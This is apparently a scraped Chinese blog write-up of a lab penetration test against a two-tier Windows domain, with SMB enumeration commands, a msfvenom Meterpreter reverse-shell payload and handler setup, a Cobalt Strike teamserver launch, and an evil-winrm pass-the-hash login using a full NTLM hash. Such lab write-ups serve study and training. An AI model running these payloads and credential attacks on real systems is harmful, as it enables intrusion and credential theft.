msf战队|渗透实战:内网域渗透( 二 )
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
前言本文记录了一次针对具有二层内网的域环境进行渗透测试的过程 , 文中涉及了内网域渗透的基本方法、思路和技巧 。 交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具 , 最后通过约束委派拿下了域控 。 其间运用了很多小工具 , 文章较长 , 下面开始此次渗透长途之旅 。
网络拓扑如下:
web服务器先来波端口扫描:
直接发现了内网的ip , 这里需要提前说明一点 , 由于靶场搭建的问题 , weblogic只在10.10.20.12这个ip上才能解析 , 所以需要调整下ip设置 , 等做完weblogic后我们在改回192段 。
看到了weblogic的版本 , 查找下exp , 顺手先来一波smb信息收集 。
【一>所有资源关注我 , 私信回复“资料”获取<一】
1、200份很多已经买不到的绝版电子书
2、30G安全大厂内部的视频资料
3、100份src文档
4、常见安全面试题
5、ctf大赛经典题目解析
6、全套工具包
smb信息收集
smbmap -H 10.10.20.12
smbclient -N -L //10.10.20.12
enum4linux -a 10.10.20.12
rpcclient -U '' 10.10.20.12
smbclient -U '' -L \\\\10.10.20.12
weblogic漏洞利用知道了weblogic的具体版本 , 可以直接去查询漏洞 , 也可以用工具自动扫描下;
这里直接用CVE的漏洞来打一波;
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.20.4 LPORT=1234 -f psh-cmd > exploit.ps1
# use exploit/multi/handler
# set payload windows/x64/meterpreter/reverse_tcp
# set lhost 10.10.20.4
# set lport 1234
# exploit
迁移下进程 , 开始抓密码;
爆破一波 , 原来是个弱口令;
接下来换成CS更方便;
./teamserver 192.168.223.138 123456
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar
信息收集一波;
weblogic数据解密在介绍下用注册表抓取hash的方法;
抓取成功后拖回本地;
在本地解密;
这里有了hash之后 , 尝试下不用msf和cs来渗透;
evil-winrm -u administrator -H ccef208c6485269c20db2cad21734fe7 -i 192.168.223.165
get-process -name lsass
- 李现与eStar队员合影并晒签名队服 称“感谢冠军战队的礼物”
- gen.g战队|3分钟卖出2亿元,骁龙8 Gen1+5000mAh,买到就是赚到
- gen.g战队|骁龙8 Gen1+120W超级闪充,起售价3999元,开卖1秒就破亿元
- gen.g战队|四款骁龙8 Gen1旗舰均已发布,是选择入手还是做等等党?
- 17战队|号称比肩RTX 3070Ti的Intel新独显又再推迟发布,OEM厂商已麻木
- gen.g战队|一大波骁龙8 Gen 1处理器手机发布,谁才是真正的性价比之王?
- 培训|新经济向各行业领域渗透,如何在职业培训中加快“数字步伐”?人社部回应
- 马桶|被低估了!智能马桶好用且健康但家庭渗透率太低:普及率不足5%
- gen.g战队|红米K50提前开始预热,卢伟冰透露3个关键,骁龙8Gen1还是有救的?
- gen.g战队|骁龙8 Gen1加持,小米12系列手机登顶安卓手机性能榜